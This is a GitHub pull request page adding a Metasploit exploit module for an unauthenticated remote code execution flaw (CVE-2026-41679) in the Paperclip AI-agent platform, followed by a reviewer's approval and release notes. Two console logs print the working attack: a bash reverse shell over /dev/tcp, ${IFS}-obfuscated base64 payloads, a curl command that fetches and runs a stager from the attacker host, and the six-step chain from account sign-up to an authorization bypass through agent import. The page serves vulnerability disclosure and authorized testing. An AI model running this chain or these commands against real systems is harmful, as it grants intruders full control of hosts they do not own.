Skip to content

Paperclip unauthenticated RCE [CVE-2026-41679]#21547

Merged
jheysel-r7 merged 2 commits into
rapid7:masterfrom
h00die-gr3y:paperclip-cve-2026-41679
Jun 11, 2026
Merged

Paperclip unauthenticated RCE [CVE-2026-41679]#21547
jheysel-r7 merged 2 commits into
rapid7:masterfrom
h00die-gr3y:paperclip-cve-2026-41679

Conversation

@h00die-gr3y

Copy link
Copy Markdown
Contributor

Paperclip is the operating system for your AI company.
You set the goals, hire AI agents as employees, and watch them plan and execute work.
Prior to version 2026.410.0, Paperclip allows for an unauthenticated RCE.
An unauthenticated attacker can achieve full remote code execution on any network-accessible Paperclip
instance running in authenticated mode with default configuration. The entire chain is six API calls.

The following Paperclip release has been tested:

  • Paperclip 2026.403.0 running on MacOS Tahoe 26.1

Installation

Installation steps to install the Paperclip application

  • Either use an fresh Ubuntu 22.04 installation or a Mac.
  • Here are the installation instructions for Paperclip.
  • Below are some small tips for installation:
  • Follow the instructions for Terminal (developer).
  • Use npx paperclipai@2026.403.0 onboard --yes to download, install and configure Paperclip.
  • To configure it in authenticated mode, locate the configuration file ~/.paperclip/instances/default/config.json.
  • Change from
  {
    "deploymentMode": "local_trusted"
  }
  • to
  {
    "deploymentMode": "authenticated"
  }
  • Start and run Paperclip with npx paperclipai@2026.403.0 run. It will accessibe on http://localhost:3100.
  • When configured in authenticated mode, you need to define a instance admin account before you can use the application.
  • You can also use npx paperclipai@2026.403.0 allowed-hostname <your server ip> to configure Paperclip to use your server ip.

You are now ready to test the module.

Verification Steps

  • Start msfconsole
  • use exploit/linux/http/paperclipai_unauth_rce_cve_2026_41679
  • set rhosts <ip-target>
  • set rport <port>
  • set lhost <attacker-ip>
  • set target <0=Unix/Linux Command>
  • exploit

you should get a reverse shell or Meterpreter session depending on the payload and target settings.

msf > use exploit/linux/http/paperclipai_unauth_rce_cve_2026_41679
[*] Using configured payload cmd/unix/reverse_bash
msf exploit(linux/http/paperclipai_unauth_rce_cve_2026_41679) > set rhosts 192.168.201.29
rhosts => 192.168.201.29
msf exploit(linux/http/paperclipai_unauth_rce_cve_2026_41679) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf exploit(linux/http/paperclipai_unauth_rce_cve_2026_41679) > set verbose true
verbose => true
msf exploit(linux/http/paperclipai_unauth_rce_cve_2026_41679) > exploit
[+] bash -c '0<&57-;exec 57<>/dev/tcp/192.168.201.8/4444;sh <&57 >&57 2>&57'
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Paperclip version 2026.403.0
[*] Executing Unix/Linux Command for cmd/unix/reverse_bash
[*] Step 1: sign-up and register a new user.
[+] user => donna.anderson@b98bl2b.y.gcj.g8o0l4yj7.ev8ji.com, password => YClakwnIwaxPdvfJ4
[*] Step 2: sign-in with the new user credentials and get a session-cookie.
[+] cookie => better-auth.session_token=dXyuEL51jpbux84ZcFt5tKhpkccrIG3w.tbyRkK5jHNSkqYg0azqD1cmnD4879UG7Yxrzl%2BLf8Xs%3D;
[*] Step 3: Create a CLI challenge and generate an API token.
[+] API token => pcp_board_3630f4ff9961a1e327a76a179d9d844c6fdbfa104022c149
[*] Step 4: Approve the challenge in your session.
[*] Step 5: Create a company and deploy an agent with payload via import (authorization bypass).
[+] payload => echo${IFS}YmFzaCAtYyAnMDwmMTk3LTtleGVjIDE5Nzw+L2Rldi90Y3AvMTkyLjE2OC4yMDEuOC80NDQ0O3NoIDwmMTk3ID4mMTk3IDI+JjE5Nyc=
|((command${IFS}-v${IFS}base64>/dev/null&&(base64${IFS}--decode||base64${IFS}-d))
||(command${IFS}-v${IFS}openssl>/dev/null&&openssl${IFS}enc${IFS}-base64${IFS}-d))|sh
[+] company_id => 0dfdd6c2-af68-49c0-8262-e0d9f73788c6, agent_id => 764300d9-eeaf-4004-b0f4-00427c867c1c
[*] Step 6: Run the agent and trigger the payload. You should get a session now ;-).
[*] Command shell session 1 opened (192.168.201.8:4444 -> 192.168.201.29:58473) at 2026-06-07 11:16:32 +0000
[*] Cleaning up the mess...
[+] Company and agent payload has been successfully archived.

uname -a
Darwin MacBook-Pro-2.local 25.1.0 Darwin Kernel Version 25.1.0: Mon Oct 20 19:26:51 PDT 2025; root:xnu-12377.41.6~2/RELEASE_X86_64 x86_64

@dwelch-r7 dwelch-r7 added module rn-modules release notes for new or majorly enhanced modules labels Jun 8, 2026
@jheysel-r7 jheysel-r7 self-assigned this Jun 10, 2026

@jheysel-r7 jheysel-r7 left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks @h00die-gr3y, this looks great. Setup was a breeze and testing was as expected. Just a couple minor comments:

msf exploit(linux/http/paperclipai_unauth_rce_cve_2026_41679) > run
[*] Command to run on remote host: curl -so ./XKJoWJYLU http://172.16.199.1:8080/Hn-8qIL46e0vZdQpIHPToA;chmod +x ./XKJoWJYLU;./XKJoWJYLU&
[*] Fetch handler listening on 172.16.199.1:8080
[*] HTTP server started
[*] Adding resource /Hn-8qIL46e0vZdQpIHPToA
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Paperclip version 2026.403.0
[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Step 1: sign-up and register a new user.
[+] user => judith.morris@4q3bizqu5.dtefsh.net, password => MsqPUJoAQfPVFw2k
[*] Step 2: sign-in with the new user credentials and get a session-cookie.
[+] cookie => better-auth.session_token=VfB17HpAGK5HXKz5FmjqWpIUFBqKujdA.O9CWuTP3vbZuj%2FlEkdBFt9EKze6j3bgvtnLoeduPU7Q%3D;
[*] Step 3: Create a CLI challenge and generate an API token.
[+] API token => pcp_board_59ba99aa38938a33f26d3cdde997caa41f318c5f721807c8
[*] Step 4: Approve the challenge in your session.
[*] Step 5: Create a company and deploy an agent with payload via import (authorization bypass).
[+] payload => echo${IFS}Y3VybCAtc28gLi9YS0pvV0pZTFUgaHR0cDovLzE3Mi4xNi4xOTkuMTo4MDgwL0huLThxSUw0NmUwdlpkUXBJSFBUb0E7Y2htb2QgK3ggLi9YS0pvV0pZTFU7Li9YS0pvV0pZTFUm|((command${IFS}-v${IFS}base64>/dev/null&&(base64${IFS}--decode||base64${IFS}-d))||(command${IFS}-v${IFS}openssl>/dev/null&&openssl${IFS}enc${IFS}-base64${IFS}-d))|sh
[+] company_id => 632845d0-0f89-481c-ae6b-3860ba1dade5, agent_id => 501dd3a7-1b87-4b24-8f94-14e3d93d3eb6
[*] Step 6: Run the agent and trigger the payload. You should get a session now ;-).
[*] Client 172.16.199.136 requested /Hn-8qIL46e0vZdQpIHPToA
[*] Sending payload to 172.16.199.136 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.16.199.136
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.136:34004) at 2026-06-10 10:46:05 -0700
[*] Cleaning up the mess...
[+] Company and agent payload has been successfully archived.

meterpreter > getuid
sServer username: msfuser
meterpreter > sysinfo
Computer     : msfuser-virtual-machine
OS           : Ubuntu 22.04 (Linux 6.8.0-124-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Comment thread modules/exploits/linux/http/paperclipai_unauth_rce_cve_2026_41679.rb Outdated
Comment thread modules/exploits/linux/http/paperclipai_unauth_rce_cve_2026_41679.rb Outdated
Comment thread modules/exploits/linux/http/paperclipai_unauth_rce_cve_2026_41679.rb Outdated
Comment thread modules/exploits/linux/http/paperclipai_unauth_rce_cve_2026_41679.rb Outdated
@github-project-automation github-project-automation Bot moved this from Todo to In Progress in Metasploit Kanban Jun 11, 2026
@jheysel-r7 jheysel-r7 merged commit f677044 into rapid7:master Jun 11, 2026
19 checks passed
@github-project-automation github-project-automation Bot moved this from In Progress to Done in Metasploit Kanban Jun 11, 2026
@jheysel-r7

Copy link
Copy Markdown
Contributor

Release Notes

This adds an module exploit for CVE-2026-41679 which exploits Paperclip. An unauthenticated attacker can achieve full remote code execution on any network-accessible Paperclip instance running in authenticated mode with default configuration. The entire chain is six API calls.

@h00die-gr3y h00die-gr3y deleted the paperclip-cve-2026-41679 branch June 12, 2026 06:33
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

docs module rn-modules release notes for new or majorly enhanced modules

Projects

Archived in project

Development

Successfully merging this pull request may close these issues.

5 participants